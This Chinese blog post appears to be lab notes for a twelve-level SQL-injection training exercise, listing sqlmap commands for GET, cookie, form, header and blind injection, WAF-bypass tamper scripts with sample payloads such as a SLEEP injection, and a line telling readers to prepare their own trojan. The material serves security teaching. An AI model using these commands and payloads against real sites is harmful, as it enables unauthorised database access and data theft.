==》Sqlmap工具试题.pdf (zmzaxg.top)《==

点击上面浏览器预览PDF

Sqlmap 工具

搭建好环境,共计 12 关都来使用 sqlmap 工具跑数据库
准备好自己的木马,例:
第一关
通过浏览器访问,能够看到页面使用 GET 传值,直接全选复制
用 kali 的 sqlmap 工具
命令行 sqlmap -u“url/1.php?name=Fixed” -dbs
提示选项都默认,直接回车就行
第二关 ua 头绕过
--random-agent 从文件./txt/user-agents.txt 中随机地取一个 User-Agent 作为 HT TP
User-Agent 头值 例: sqlmap -u "http://127.0.0.1?id=1" --random-agent
第三关 POST 注入
第四关 cookie 注入
1.通过 sqlmap -r 及 –level 等级 3 跑抓包文件
2.使用 sqlmap -u 及 -cookie 指定上面抓包内的 cookie

第五关 表单注入
使用 sqlmap 的—forms 测试目标 url
--forms 解析和测试目标 URL 表单 sqlmap -u "http://127.0.0.1" –forms
第六关 http 头注入
抓包,加一行 X-Forwarded-For
使用 sqlmap -p
-p 指定测试参数 , 若想只测试 GET 参 数 “id” 和 User-Agent 例 : sqlmap -u
"http://127.0.0.1?id=1" -p "id,user-agent"
指定 X-Forwarded-For 测试伪造 ip 注入

第 7 关 盲注
--dbms 指定数据库类型,支持以下这些数据库管理系统:MySQL,Oracle,PostgreSQL,S QL
Server,Access,Firebird,SQLite,Sybase,SAP MaxDB,DB2 例 : sqlmap -u
"http://127.0.0.1?id=1" --dbms Access
--threads 设置线程默认为 1 最大为 10 例: sqlmap -u "http://127.0.0.1?id=1" --
threads 10
--technique 指定注入类型 其值为 B、E、U、S、T 或 Q,含义如下:
T:Time-based blind(基于时间延迟注入)
可以用“--technique ES”来指定使用两种检测技术。“--technique BEUSTQ”与默认情况等
效。
第八关 空格绕过注入
space2comment.py
测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle
10g、PostgreSQL 8.3, 8.4, 9.0
作用:将空格替换为/**/
使用脚本前:tamper('SELECT id FROM users')
使用脚本后:SELECT//id//FROM/**/users
sqlmap -u [url] --tamper [模块名]
第九关 绕过“<>”
第十关 base64
base64encode.py
适用数据库:ALL
作用:替换为 base64 编码
使用脚本前:tamper("1' AND SLEEP(5)#")
使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
GET -p “name”
第十一关 绕过=号
equaltolike.py
测试通过数据库:Microsof t SQL Server 2005、MySQL 4, 5.0 and 5.5
作用:将=替换为 LIKE
使用脚本前:tamper('SELECT * FROM users WHERE id=1')
使用脚本后:SELECT * FROM users WHERE id LIKE 1
第十二关 绕过 AND OR

image.png

最后修改:2023 年 07 月 30 日
觉得文章有用,可以赞赏请我喝瓶冰露